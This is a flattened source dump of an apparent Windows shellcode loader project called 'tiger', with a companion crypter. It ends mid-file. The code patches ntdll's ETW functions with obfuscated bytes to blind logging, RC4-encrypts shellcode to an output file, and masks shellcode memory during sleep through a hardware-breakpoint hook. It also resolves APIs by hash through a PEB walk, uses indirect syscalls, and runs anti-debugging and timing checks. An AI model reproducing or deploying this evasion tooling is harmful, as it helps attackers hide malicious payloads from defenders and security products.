#include "../helper_functions.h" 7 | #include "../debug/debug.h" 8 | 9 | // Todo: 10 | // Needs to be converted to use indirect syscalls 11 | // 12 | BOOL DisableETW(DWORD64 EtwFunctionHash) { 13 | 14 | #ifdef DEBUG 15 | PRINTA("\n\ 16 | <><><><><><><><><><><>< STARTING ETW DISABLER ><><><><><><><><><><><><>\n"); 17 | #endif 18 | 19 | BOOL res = FALSE; 20 | DWORD dwOld = 0; 21 | 22 | // xor eax, eax 23 | // ret 24 | /* 25 | BYTE patch[] = { 26 | 0x31, 0xc0, 27 | 0xc3 28 | }; 29 | */ 30 | 31 | unsigned char _key = 0x86; 32 | BYTE xpatch[] = { 33 | 0xb7, 0x46, 0x45 34 | }; 35 | 36 | SIZE_T patchSize = sizeof(xpatch); 37 | 38 | t_VirtualProtect VirtualProtect = (t_VirtualProtect)_GetProcAddress(_GetModuleHandle(KERNEL32_HASH), VIRTUALPROTECT_HASH); 39 | t_GetLastError GetLastError = (t_GetLastError)_GetProcAddress(_GetModuleHandle(KERNEL32_HASH), GETLASTERROR_HASH); 40 | if (VirtualProtect == NULL || 41 | GetLastError == NULL) { 42 | return FALSE; 43 | } 44 | 45 | PBYTE pEtw = (PBYTE)_GetProcAddress(_GetModuleHandle(NTDLL_HASH), EtwFunctionHash); 46 | if (pEtw == NULL) { 47 | return FALSE; 48 | } 49 | 50 | if (VirtualProtect(pEtw, patchSize, PAGE_READWRITE, &dwOld) == 0) { 51 | #ifdef DEBUG 52 | PRINTA("[!] Failed changing protection -> RW (%d) !\n", GetLastError()); 53 | #endif 54 | return FALSE; 55 | } 56 | else { 57 | 58 | #ifdef DEBUG 59 | PRINTA("[+] Successfully changed protection -> RW !\n"); 60 | #endif 61 | } 62 | 63 | ZwMoveMemory(pEtw, xpatch, patchSize); 64 | XORA(pEtw, _key, patchSize); 65 | 66 | #ifdef DEBUG 67 | PRINTA("[+] ETW Patch applied successfully\n"); 68 | #endif 69 | 70 | if (VirtualProtect(pEtw, patchSize, dwOld, &dwOld) == 0) { 71 | #ifdef DEBUG 72 | PRINTA("[!] Failed to restore protection (%d) !\n", GetLastError()); 73 | #endif 74 | return FALSE; 75 | } 76 | else { 77 | res = TRUE; 78 | #ifdef DEBUG 79 | PRINTA("[+] Successfully restored protection !\n"); 80 | #endif 81 | } 82 | 83 | if (res != FALSE) { 84 | return TRUE; 85 | } 86 | else { 87 | return FALSE; 88 | } 89 | } 90 | -------------------------------------------------------------------------------- /tiger/encryption/rc4.c: -------------------------------------------------------------------------------- 1 | #include "rc4.h" 2 | 3 | #define WIN32_NO_STATUS 4 | 5 | typedef struct tag_arc4_info { 6 | unsigned char state[256]; 7 | unsigned char x, y; 8 | } arc4_info; 9 | 10 | static void arc4_init(arc4_info* a4i, const BYTE* key, unsigned int keyLen) 11 | { 12 | unsigned int keyIndex = 0, stateIndex = 0; 13 | unsigned int i, a; 14 | 15 | a4i->x = a4i->y = 0; 16 | 17 | for (i = 0; i < 256; i++) 18 | a4i->state[i] = i; 19 | 20 | for (i = 0; i < 256; i++) 21 | { 22 | a = a4i->state[i]; 23 | stateIndex += key[keyIndex] + a; 24 | stateIndex &= 0xff; 25 | a4i->state[i] = a4i->state[stateIndex]; 26 | a4i->state[stateIndex] = a; 27 | if (++keyIndex >= keyLen) 28 | keyIndex = 0; 29 | } 30 | } 31 | 32 | static void arc4_ProcessString(arc4_info* a4i, BYTE* inoutString, unsigned int length) 33 | { 34 | BYTE* const s = a4i->state; 35 | unsigned int x = a4i->x; 36 | unsigned int y = a4i->y; 37 | unsigned int a, b; 38 | 39 | while (length--) 40 | { 41 | x = (x + 1) & 0xff; 42 | a = s[x]; 43 | y = (y + a) & 0xff; 44 | b = s[y]; 45 | s[x] = b; 46 | s[y] = a; 47 | *inoutString++ ^= s[(a + b) & 0xff]; 48 | } 49 | 50 | a4i->x = x; 51 | a4i->y = y; 52 | } 53 | 54 | /****************************************************************************** 55 | * SystemFunction032 [ADVAPI32.@] 56 | * 57 | * Encrypts a string data using ARC4 58 | * 59 | * PARAMS 60 | * data [I/O] data to encrypt 61 | * key [I] key data 62 | * 63 | * RETURNS 64 | * Success: STATUS_SUCCESS 65 | * Failure: STATUS_UNSUCCESSFUL 66 | * 67 | * NOTES 68 | * see http://web.it.kth.se/~rom/ntsec.html#crypto-strongavail 69 | */ 70 | NTSTATUS WINAPI SystemFunction032(struct ustring* data, const struct ustring* key) 71 | { 72 | arc4_info a4i; 73 | 74 | arc4_init(&a4i, key->Buffer, key->Length); 75 | arc4_ProcessString(&a4i, data->Buffer, data->Length); 76 | 77 | return STATUS_SUCCESS; 78 | } 79 | 80 | NTSTATUS CryptMemory032(PVOID memoryAddr, SIZE_T memoryblkSize, char* key, SIZE_T keySize) { 81 | 82 | NTSTATUS STATUS = NULL; 83 | 84 | struct ustring _data; 85 | struct ustring _key; 86 | 87 | _data.Buffer = (PUCHAR)memoryAddr; 88 | _data.Length = memoryblkSize; 89 | 90 | _key.Buffer = (PUCHAR)key; 91 | _key.Length = keySize; 92 | 93 | if ((STATUS = SystemFunction032(&_data, &_key)) != STATUS_SUCCESS) { 94 | return STATUS_UNSUCCESSFUL; 95 | } 96 | else { 97 | return STATUS_SUCCESS; 98 | } 99 | } -------------------------------------------------------------------------------- /tiger/hooks/hook_functions.c: -------------------------------------------------------------------------------- 1 | #include "../indirect_syscall.h" 2 | #include "../typedefs.h" 3 | #include "../debug/debug.h" 4 | #include "hook_functions.h" 5 | #include "hwbp.h" 6 | 7 | 8 | PVOID _G_pScAddress; 9 | HANDLE _G_hProcess; 10 | SIZE_T _G_sSize; 11 | ULONG _G_dwProtection; 12 | 13 | NTAPI_FUNC _G_NTFUNC; 14 | 15 | BOOL set_scaddress(HANDLE hProcess, PVOID pScAddress, SIZE_T sSize, ULONG dwProtection) { 16 | if (hProcess == NULL | 17 | pScAddress == NULL | 18 | sSize == 0 19 | //dwProtection == 0 20 | ) { 21 | return FALSE; 22 | } 23 | 24 | _G_hProcess = hProcess; 25 | _G_pScAddress = pScAddress; 26 | _G_sSize = sSize; 27 | _G_dwProtection = dwProtection; 28 | 29 | return TRUE; 30 | } 31 | 32 | // Jump function for WinAPI() 33 | int __stdcall hook_MessageBox(HWND hWnd, LPCSTR lpText, LPCSTR lpCaption, UINT uType) { 34 | #ifdef DEBUG 35 | PRINTA("\t[!HOOK!] Entered hook function !\n"); 36 | PRINTA("\t[+HOOK+] Modifying shellcode memory block to PAGE_NOACCESS\n"); 37 | #endif 38 | 39 | NTSTATUS STATUS = NULL; 40 | LARGE_INTEGER DelayInterval = { 0 }; 41 | DelayInterval.QuadPart = WAITTIMER; 42 | 43 | // This call was already obtained so we can just call it 44 | // Call NtProtectVirtualMemory and set PAGE_NOACCESS to the shellcode memory block 45 | SET_SYSCALL(_G_NTFUNC.NtProtectVirtualMemory); 46 | if ((STATUS = RunSyscall(_G_hProcess, &_G_pScAddress, &_G_sSize, PAGE_NOACCESS, &_G_dwProtection)) != 0x00) { 47 | #ifdef DEBUG 48 | PRINTA("\t[!HOOK!] NtProtectVirtualMemory Failed With Status : 0x%0.8X\n", STATUS); 49 | #endif 50 | return -1; 51 | } 52 | 53 | #ifdef DEBUG 54 | PRINTA("\t[!HOOK!] NtProtectVirtualMemory Succeeded With Status : 0x%0.8X\n", STATUS); 55 | //system("pause"); 56 | #endif 57 | 58 | #ifdef DEBUG 59 | PRINTA("\t[!HOOK!] Removing HWBP from Sleep\n"); 60 | #endif 61 | // Unset the HWBP on MessageBoxA and continue execution 62 | HWBP(NtCurrentThread(), (DWORD64)&MessageBoxA, FALSE); 63 | 64 | #ifdef DEBUG 65 | PRINTA("\t[+HOOK+] Sleeping for %d\n", DelayInterval.QuadPart); 66 | #endif 67 | 68 | // Get syscall info 69 | if (!ObtainSyscall(NTDELAYEXECUTION_HASH, &_G_NTFUNC.NtDelayExecution)) { 70 | return -1; 71 | } 72 | // Delay execution further by some time 73 | SET_SYSCALL(_G_NTFUNC.NtDelayExecution); 74 | if ((STATUS = RunSyscall(FALSE, &DelayInterval)) != 0x00) { 75 | #ifdef DEBUG 76 | PRINTA("\t[!HOOK!] NtDelayExecution Failed With Error: 0x%0.8X \n", STATUS); 77 | #endif 78 | return -1; 79 | } 80 | 81 | #ifdef DEBUG 82 | PRINTW(L"\t[*HOOK*] NtDelayExecution slept for -> %d\n", DelayInterval.QuadPart); 83 | #endif 84 | 85 | #ifdef DEBUG 86 | PRINTA("\t[+HOOK+] Done ! Continue\n"); 87 | #endif 88 | return 0; 89 | 90 | } -------------------------------------------------------------------------------- /tiger_crypters/tiger_crypters.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | {3f94aed7-2c6a-45be-a6eb-6214375de29d} 18 | 19 | 20 | {ba289859-b430-4e4e-9478-a84ba52ed390} 21 | 22 | 23 | {96a5f009-1882-4fa6-9aa8-4fc49b4d8e6f} 24 | 25 | 26 | {7a43170a-7a64-4937-b579-adde844e2498} 27 | 28 | 29 | 30 | 31 | Header Files 32 | 33 | 34 | Header Files 35 | 36 | 37 | Header Files 38 | 39 | 40 | Header Files\rc4 41 | 42 | 43 | Header Files\xor 44 | 45 | 46 | 47 | 48 | Source Files 49 | 50 | 51 | Source Files\rc4 52 | 53 | 54 | Source Files\xor 55 | 56 | 57 | 58 | 59 | Resource Files 60 | 61 | 62 | 63 | 64 | Resource Files 65 | 66 | 67 | -------------------------------------------------------------------------------- /.gitattributes: -------------------------------------------------------------------------------- 1 | ############################################################################### 2 | # Set default behavior to automatically normalize line endings. 3 | ############################################################################### 4 | * text=auto 5 | 6 | ############################################################################### 7 | # Set default behavior for command prompt diff. 8 | # 9 | # This is need for earlier builds of msysgit that does not have it on by 10 | # default for csharp files. 11 | # Note: This is only used by command line 12 | ############################################################################### 13 | #*.cs diff=csharp 14 | 15 | ############################################################################### 16 | # Set the merge driver for project and solution files 17 | # 18 | # Merging from the command prompt will add diff markers to the files if there 19 | # are conflicts (Merging from VS is not affected by the settings below, in VS 20 | # the diff markers are never inserted). Diff markers may cause the following 21 | # file extensions to fail to load in VS. An alternative would be to treat 22 | # these files as binary and thus will always conflict and require user 23 | # intervention with every merge. To do so, just uncomment the entries below 24 | ############################################################################### 25 | #*.sln merge=binary 26 | #*.csproj merge=binary 27 | #*.vbproj merge=binary 28 | #*.vcxproj merge=binary 29 | #*.vcproj merge=binary 30 | #*.dbproj merge=binary 31 | #*.fsproj merge=binary 32 | #*.lsproj merge=binary 33 | #*.wixproj merge=binary 34 | #*.modelproj merge=binary 35 | #*.sqlproj merge=binary 36 | #*.wwaproj merge=binary 37 | 38 | ############################################################################### 39 | # behavior for image files 40 | # 41 | # image files are treated as binary by default. 42 | ############################################################################### 43 | #*.jpg binary 44 | #*.png binary 45 | #*.gif binary 46 | 47 | ############################################################################### 48 | # diff behavior for common document formats 49 | # 50 | # Convert binary document formats to text before diffing them. This feature 51 | # is only available from the command line. Turn it on by uncommenting the 52 | # entries below. 53 | ############################################################################### 54 | #*.doc diff=astextplain 55 | #*.DOC diff=astextplain 56 | #*.docx diff=astextplain 57 | #*.DOCX diff=astextplain 58 | #*.dot diff=astextplain 59 | #*.DOT diff=astextplain 60 | #*.pdf diff=astextplain 61 | #*.PDF diff=astextplain 62 | #*.rtf diff=astextplain 63 | #*.RTF diff=astextplain 64 | -------------------------------------------------------------------------------- /tiger_crypters/encryption/rc4.cpp: -------------------------------------------------------------------------------- 1 | #include "rc4.h" 2 | #include "../resource.h" 3 | 4 | BOOL _CryptMemory032() { 5 | 6 | char func32[] = "SystemFunction032"; 7 | 8 | HMODULE hAdvapi = LoadLibraryA("advapi32.dll"); 9 | t_SystemFunction032 SystemFunction032 = (t_SystemFunction032)GetProcAddress(hAdvapi, func32); 10 | 11 | if (SystemFunction032) 12 | printf("++ Found %s ( 0x%p )\n", func32, SystemFunction032); 13 | 14 | // Encrypt ? 15 | // Shellcode from .rsrc 16 | HRSRC res = FindResourceW(NULL, MAKEINTRESOURCEW(IDR_SCODE1), RT_RCDATA); 17 | HGLOBAL hRes = LoadResource(NULL, res); 18 | unsigned char* shellcode = (unsigned char*)LockResource(hRes); 19 | DWORD shellcodeSize = SizeofResource(NULL, res); 20 | 21 | //Shellcode as variable 22 | /* 23 | unsigned char shellcode[] = 24 | "\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50" 25 | .... 26 | */ 27 | 28 | //const char key[] = "LK8mT&9o3zShqrc#V2c%tZ^qM#VhQ7DY4QyUxnEQ&6C9zn7i#TD&6j%LTz9QB"; 29 | CHAR key[] = { 'X','@','f','8','k','d','3','T','D','o','!','r','j','E' }; 30 | ustring _data; 31 | ustring _key; 32 | 33 | PVOID scaddr = VirtualAlloc(NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 34 | printf("Allocated memory addr-> %p\n", scaddr); 35 | 36 | memmove(scaddr, shellcode, shellcodeSize); 37 | 38 | // For variable-based shellcode 39 | // 40 | //_data.Buffer = (PUCHAR)shellcode; 41 | //_data.Length = sizeof shellcode; 42 | 43 | // For .rsrc based shellcode from .bin file 44 | _data.Buffer = (PUCHAR)scaddr; 45 | _data.Length = shellcodeSize; 46 | 47 | _key.Buffer = (PUCHAR)&key; 48 | _key.Length = sizeof key; 49 | 50 | printf("Length-> %d\n\n", shellcodeSize); 51 | //printf("Addr shellcode-> SC: %p | _data: %p\n", shellcode, _data.Buffer); 52 | 53 | 54 | SystemFunction032(&_data, &_key); 55 | 56 | // 57 | // Remove below comments to get the HEX value of the encrypted shellcode ! 58 | // 59 | 60 | printf("unsigned char buf[] = \""); 61 | 62 | SIZE_T i = 0; 63 | for (i; i < _data.Length; i++) { 64 | 65 | //printf("\\x%02x", _data.Buffer[i]); 66 | 67 | } 68 | //printf("\";\n"); 69 | //printf("\n"); 70 | 71 | // Stores the payload in the current folder as this executable 72 | wchar_t filename[] = L"payload_enc.bin"; 73 | 74 | HANDLE hFile = CreateFileW(filename, GENERIC_ALL, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); 75 | if (!hFile) { 76 | printf("Failed creating the %ws file-> %d\n", filename, GetLastError()); 77 | } 78 | printf("\n\nCreated %ws\n", filename); 79 | 80 | DWORD bytesWritten = 0; 81 | if (WriteFile(hFile, scaddr, shellcodeSize, &bytesWritten, NULL)) { 82 | printf("+ Wrote successfully !\n"); 83 | } 84 | else { 85 | printf("- Error writing the file ! ( %d ) \n", GetLastError()); 86 | return 1; 87 | } 88 | 89 | VirtualFree(scaddr, shellcodeSize, MEM_FREE); 90 | CloseHandle(hFile); 91 | 92 | FreeLibrary(hAdvapi); 93 | 94 | return 0; 95 | } -------------------------------------------------------------------------------- /tiger.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 17 4 | VisualStudioVersion = 17.7.34018.315 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "tiger", "tiger\tiger.vcxproj", "{A57491FB-D17E-4CC0-8ED9-90941322A55C}" 7 | EndProject 8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "tiger_crypters", "tiger_crypters\tiger_crypters.vcxproj", "{DECD3C3D-EEFF-4C1D-9CF6-EFC0A98714EC}" 9 | EndProject 10 | Global 11 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 12 | Debug|x64 = Debug|x64 13 | Debug|x86 = Debug|x86 14 | FinalDLLRelease|x64 = FinalDLLRelease|x64 15 | FinalDLLRelease|x86 = FinalDLLRelease|x86 16 | FinalRelease|x64 = FinalRelease|x64 17 | FinalRelease|x86 = FinalRelease|x86 18 | Release|x64 = Release|x64 19 | Release|x86 = Release|x86 20 | EndGlobalSection 21 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 22 | {A57491FB-D17E-4CC0-8ED9-90941322A55C}.Debug|x64.ActiveCfg = Debug|x64 23 | {A57491FB-D17E-4CC0-8ED9-90941322A55C}.Debug|x64.Build.0 = Debug|x64 24 | {A57491FB-D17E-4CC0-8ED9-90941322A55C}.Debug|x86.ActiveCfg = Debug|Win32 25 | {A57491FB-D17E-4CC0-8ED9-90941322A55C}.Debug|x86.Build.0 = Debug|Win32 26 | {A57491FB-D17E-4CC0-8ED9-90941322A55C}.FinalDLLRelease|x64.ActiveCfg = FinalDLLRelease|x64 27 | {A57491FB-D17E-4CC0-8ED9-90941322A55C}.FinalDLLRelease|x64.Build.0 = FinalDLLRelease|x64 28 | {A57491FB-D17E-4CC0-8ED9-90941322A55C}.FinalDLLRelease|x86.ActiveCfg = FinalDLLRelease|Win32 29 | {A57491FB-D17E-4CC0-8ED9-90941322A55C}.FinalDLLRelease|x86.Build.0 = FinalDLLRelease|Win32 30 | {A57491FB-D17E-4CC0-8ED9-90941322A55C}.FinalRelease|x64.ActiveCfg = FinalRelease|x64 31 | {A57491FB-D17E-4CC0-8ED9-90941322A55C}.FinalRelease|x64.Build.0 = FinalRelease|x64 32 | {A57491FB-D17E-4CC0-8ED9-90941322A55C}.FinalRelease|x86.ActiveCfg = FinalRelease|Win32 33 | {A57491FB-D17E-4CC0-8ED9-90941322A55C}.FinalRelease|x86.Build.0 = FinalRelease|Win32 34 | {A57491FB-D17E-4CC0-8ED9-90941322A55C}.Release|x64.ActiveCfg = Release|x64 35 | {A57491FB-D17E-4CC0-8ED9-90941322A55C}.Release|x64.Build.0 = Release|x64 36 | {A57491FB-D17E-4CC0-8ED9-90941322A55C}.Release|x86.ActiveCfg = Release|Win32 37 | {A57491FB-D17E-4CC0-8ED9-90941322A55C}.Release|x86.Build.0 = Release|Win32 38 | {DECD3C3D-EEFF-4C1D-9CF6-EFC0A98714EC}.Debug|x64.ActiveCfg = Debug|x64 39 | {DECD3C3D-EEFF-4C1D-9CF6-EFC0A98714EC}.Debug|x64.Build.0 = Debug|x64 40 | {DECD3C3D-EEFF-4C1D-9CF6-EFC0A98714EC}.Debug|x86.ActiveCfg = Debug|Win32 41 | {DECD3C3D-EEFF-4C1D-9CF6-EFC0A98714EC}.Debug|x86.Build.0 = Debug|Win32 42 | {DECD3C3D-EEFF-4C1D-9CF6-EFC0A98714EC}.FinalDLLRelease|x64.ActiveCfg = Release|x64 43 | {DECD3C3D-EEFF-4C1D-9CF6-EFC0A98714EC}.FinalDLLRelease|x86.ActiveCfg = FinalDLLRelease|Win32 44 | {DECD3C3D-EEFF-4C1D-9CF6-EFC0A98714EC}.FinalDLLRelease|x86.Build.0 = FinalDLLRelease|Win32 45 | {DECD3C3D-EEFF-4C1D-9CF6-EFC0A98714EC}.FinalRelease|x64.ActiveCfg = Release|x64 46 | {DECD3C3D-EEFF-4C1D-9CF6-EFC0A98714EC}.FinalRelease|x64.Build.0 = Release|x64 47 | {DECD3C3D-EEFF-4C1D-9CF6-EFC0A98714EC}.FinalRelease|x86.ActiveCfg = Release|Win32 48 | {DECD3C3D-EEFF-4C1D-9CF6-EFC0A98714EC}.FinalRelease|x86.Build.0 = Release|Win32 49 | {DECD3C3D-EEFF-4C1D-9CF6-EFC0A98714EC}.Release|x64.ActiveCfg = Release|x64 50 | {DECD3C3D-EEFF-4C1D-9CF6-EFC0A98714EC}.Release|x64.Build.0 = Release|x64 51 | {DECD3C3D-EEFF-4C1D-9CF6-EFC0A98714EC}.Release|x86.ActiveCfg = Release|Win32 52 | {DECD3C3D-EEFF-4C1D-9CF6-EFC0A98714EC}.Release|x86.Build.0 = Release|Win32 53 | EndGlobalSection 54 | GlobalSection(SolutionProperties) = preSolution 55 | HideSolutionNode = FALSE 56 | EndGlobalSection 57 | GlobalSection(ExtensibilityGlobals) = postSolution 58 | SolutionGuid = {EB4878C2-1C4A-4B9E-8E31-F4E6F7F0C5A8} 59 | EndGlobalSection 60 | EndGlobal 61 | -------------------------------------------------------------------------------- /tiger/custom_loaderapi.c: -------------------------------------------------------------------------------- 1 | #include "custom_loaderapi.h" 2 | #include "string_hashing.h" 3 | #include "structs.h" 4 | #include "debug/debug.h" 5 | 6 | #define ERR -0x1 7 | #define SUCCESS 0x0 8 | 9 | #define STRUCTS 10 | 11 | HMODULE Custom_GetModuleHandle(DWORD64 ModuleHash) { 12 | 13 | // Obtain the PEB offset 14 | #ifdef _WIN64 15 | PPEB pPeb = (PEB*)(__readgsqword(0x60)); 16 | #elif _WIN32 17 | PPEB pPeb = (PEB*)(__readfsdword(0x30)); 18 | #endif 19 | 20 | // PEB LDR DATA to be able to retrieve the module data 21 | PPEB_LDR_DATA LdrData = pPeb->LdrData; 22 | 23 | // Retrieve all memory-loaded Module entries 24 | PLDR_DATA_TABLE_ENTRY LdrDataTableEntry = (PLDR_DATA_TABLE_ENTRY)LdrData->InMemoryOrderModuleList.Flink; 25 | 26 | // Go through all loaded modules and verify 27 | while (LdrDataTableEntry) { 28 | if (LdrDataTableEntry->FullDllName.Length != NULL) { 29 | 30 | // Verify the module name matches the one of the hash 31 | if (CRC32B((PBYTE)LdrDataTableEntry->FullDllName.Buffer) == ModuleHash) { 32 | //printf("\t[!] FOUND: \"%ws\" ( %#p ) \n", LdrDataTableEntry->FullDllName.Buffer, (HMODULE)(LdrDataTableEntry->InInitializationOrderLinks.Flink)); 33 | 34 | #ifdef STRUCTS 35 | return (HMODULE)(LdrDataTableEntry->InInitializationOrderLinks.Flink); 36 | #else 37 | return (HMODULE)LdrDataTableEntry->Reserved2[0]; 38 | #endif 39 | } 40 | } 41 | else { break; } 42 | 43 | // Continue the loop if we didnt find the module we're looking for 44 | LdrDataTableEntry = *(PLDR_DATA_TABLE_ENTRY*)(LdrDataTableEntry); 45 | } 46 | 47 | return NULL; 48 | 49 | } 50 | 51 | // 52 | // Does NOT work with forwarded functions 53 | // so if a function is forwarded, it will need manual debugging 54 | // to find where the function is actually located 55 | // 56 | FARPROC Custom_GetProcAddress(HMODULE hModule, DWORD64 ApiHash) { 57 | 58 | // Declare storing variables 59 | FARPROC pFunctionAddress = NULL; 60 | HMODULE hModuleBase = hModule; 61 | 62 | if (hModuleBase == NULL) { 63 | return ERR; 64 | } 65 | 66 | // Obtain image dos headers 67 | PIMAGE_DOS_HEADER imgDosHdr = (PIMAGE_DOS_HEADER)hModuleBase; 68 | 69 | // Obtain NT headers 70 | PIMAGE_NT_HEADERS imgNtHdr = (PIMAGE_NT_HEADERS)((unsigned char*)imgDosHdr + imgDosHdr->e_lfanew); 71 | 72 | // Obtain Optional headers 73 | PIMAGE_OPTIONAL_HEADER imgOptHdr = (PIMAGE_OPTIONAL_HEADER)&imgNtHdr->OptionalHeader; 74 | 75 | // From optional headers, get the Data Directory's Exports 76 | PIMAGE_DATA_DIRECTORY imgDataDir = &imgOptHdr->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]; 77 | 78 | // Obtain the export directory and retrieve the address of it 79 | PIMAGE_EXPORT_DIRECTORY imgExportDir = (PIMAGE_EXPORT_DIRECTORY)((unsigned char*)hModuleBase + imgDataDir->VirtualAddress); 80 | 81 | DWORD numberOfNames = imgExportDir->NumberOfNames; 82 | PDWORD AddressOfFunctions = (PDWORD)((unsigned char*)hModuleBase + imgExportDir->AddressOfFunctions); 83 | PWORD AddressOfNameOrdinals = (PWORD)((unsigned char*)hModuleBase + imgExportDir->AddressOfNameOrdinals); 84 | PDWORD AddressOfNames = (PDWORD)((unsigned char*)hModuleBase + imgExportDir->AddressOfNames); 85 | 86 | // Loop through all exported function 87 | DWORD index = 0; 88 | for (index; index < numberOfNames; index++) { 89 | PCHAR FunctionName = (PCHAR)((PBYTE)hModuleBase + AddressOfNames[index]); 90 | PVOID targetFunctionAddress = (PBYTE)hModuleBase + AddressOfFunctions[AddressOfNameOrdinals[index]]; 91 | 92 | // Match the hash with the function we're looking for 93 | if (CRC32B((PBYTE)FunctionName) == ApiHash) { 94 | pFunctionAddress = targetFunctionAddress; 95 | //PRINTA("FOUND: %s -> 0x%p\n", FunctionName, pFunctionAddress); 96 | } 97 | } 98 | 99 | if (pFunctionAddress != NULL) { 100 | return pFunctionAddress; 101 | } 102 | 103 | return NULL; 104 | } 105 | -------------------------------------------------------------------------------- /tiger/anti-analysis/anti-debug.c: -------------------------------------------------------------------------------- 1 | #include "anti-debug.h" 2 | #include "../debug/debug.h" 3 | #include "../custom_loaderapi.h" 4 | #include "../indirect_syscall.h" 5 | 6 | // https://github.com/LordNoteworthy/al-khaser 7 | 8 | BOOL AntiDebugPEBCheck() { 9 | // Obtain the PEB offset 10 | #ifdef _WIN64 11 | PPEB pPeb = (PEB*)(__readgsqword(0x60)); 12 | #elif _WIN32 13 | PPEB pPeb = (PEB*)(__readfsdword(0x30)); 14 | #endif 15 | 16 | BOOLEAN debugged = pPeb->BeingDebugged; 17 | return (debugged == 1) ? TRUE : FALSE; 18 | } 19 | 20 | BOOL NtGlobalFlagCheck(VOID) 21 | /*++ 22 | 23 | Routine Description: 24 | 25 | NtGlobalFlag is a DWORD value inside the process PEB. This value 26 | contains many flags set by the OS that affects the way the process 27 | runs. When a process is being debugged, the flags: 28 | - FLG_HEAP_ENABLE_TAIL_CHECK (0x10) 29 | - FLG_HEAP_ENABLE_FREE_CHECK (0x20) 30 | - FLG_HEAP_VALIDATE_PARAMETERS(0x40) are set for the process 31 | 32 | If the 32-bit executable is being run on a 64-bit system, both the 33 | 32-bit and 64-bit PEBs are checked. The WoW64 PEB address is 34 | fetched via the WoW64 Thread Environment Block (TEB) at FS:[0x18]-0x2000. 35 | 36 | Arguments: 37 | 38 | None 39 | 40 | Return Value: 41 | 42 | TRUE - if debugger was detected 43 | FALSE - otherwise 44 | --*/ 45 | { 46 | PDWORD pNtGlobalFlag = NULL, 47 | pNtGlobalFlagWoW64 = NULL; 48 | 49 | #if defined (ENV64BIT) 50 | pNtGlobalFlag = (PDWORD)(__readgsqword(0x60) + 0xBC); 51 | 52 | #elif defined(ENV32BIT) 53 | /* NtGlobalFlags for real 32-bits OS */ 54 | BYTE* _teb32 = (BYTE*)__readfsdword(0x18); 55 | DWORD _peb32 = *(DWORD*)(_teb32 + 0x30); 56 | pNtGlobalFlag = (PDWORD)(_peb32 + 0x68); 57 | 58 | if (IsWoW64()) 59 | { 60 | /* In Wow64, there is a separate PEB for the 32-bit portion and the 64-bit portion 61 | which we can double-check */ 62 | 63 | BYTE* _teb64 = (BYTE*)__readfsdword(0x18) - 0x2000; 64 | DWORD64 _peb64 = *(DWORD64*)(_teb64 + 0x60); 65 | pNtGlobalFlagWoW64 = (PDWORD)(_peb64 + 0xBC); 66 | } 67 | #endif 68 | 69 | BOOL normalDetected = pNtGlobalFlag && *pNtGlobalFlag & 0x00000070; 70 | BOOL wow64Detected = pNtGlobalFlagWoW64 && *pNtGlobalFlagWoW64 & 0x00000070; 71 | 72 | if (normalDetected || wow64Detected) 73 | return TRUE; 74 | else 75 | return FALSE; 76 | } 77 | 78 | 79 | // (-N) indicates to current relative time 80 | // example -150000000 -> 15 secs 81 | // llNanoseconds = -10000000 -> 1 sec 82 | BOOL DelayExecution(LONGLONG llNanoseconds) { 83 | 84 | t_GetTickCount64 GetTickCount64 = (t_GetTickCount64)_GetProcAddress(_GetModuleHandle(KERNEL32_HASH), GETTICKCOUNT64_HASH); 85 | 86 | NTAPI_FUNC _G_NTFUNC = { 0 }; 87 | 88 | LARGE_INTEGER DelayInterval = { 0 }; 89 | LONGLONG Delay = llNanoseconds; 90 | NTSTATUS STATUS = NULL; 91 | LONGLONG _T0 = NULL, 92 | _T1 = NULL; 93 | 94 | DelayInterval.QuadPart = Delay; 95 | 96 | _T0 = GetTickCount64(); 97 | 98 | // https://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FNT%20Objects%2FThread%2FNtDelayExecution.html 99 | if (!ObtainSyscall(NTDELAYEXECUTION_HASH, &_G_NTFUNC.NtDelayExecution)) { 100 | return -1; 101 | } 102 | SET_SYSCALL(_G_NTFUNC.NtDelayExecution); 103 | 104 | #ifdef DEBUG 105 | PRINTA("[+] Starting execution delay!\n"); 106 | #endif 107 | 108 | if ((STATUS = RunSyscall(FALSE, &DelayInterval)) != 0x00 && STATUS != STATUS_TIMEOUT) { 109 | 110 | #ifdef DEBUG 111 | PRINTA("[!] NtDelayExecution Failed With Error: 0x%0.8X \n", STATUS); 112 | #endif 113 | 114 | return -1; 115 | } 116 | #ifdef DEBUG 117 | PRINTW(L"[*] NtDelayExecution slept for -> %d\n", DelayInterval.QuadPart); 118 | #endif 119 | 120 | _T1 = GetTickCount64(); 121 | 122 | if ((_T1 - _T0) < DelayInterval.QuadPart) { 123 | return FALSE; 124 | } 125 | 126 | return TRUE; 127 | } -------------------------------------------------------------------------------- /tiger/mutex/mutex.c: -------------------------------------------------------------------------------- 1 | #include "mutex.h" 2 | #include "ntstatus.h" 3 | #include "../indirect_syscall.h" 4 | #include "../custom_loaderapi.h" 5 | #include "../string_hashing.h" 6 | #include "../typedefs.h" 7 | 8 | #include "../debug/debug.h" 9 | 10 | NTAPI_FUNC _G_NTFUNC; 11 | 12 | BOOL InitialiaseNTSyscalls() { 13 | 14 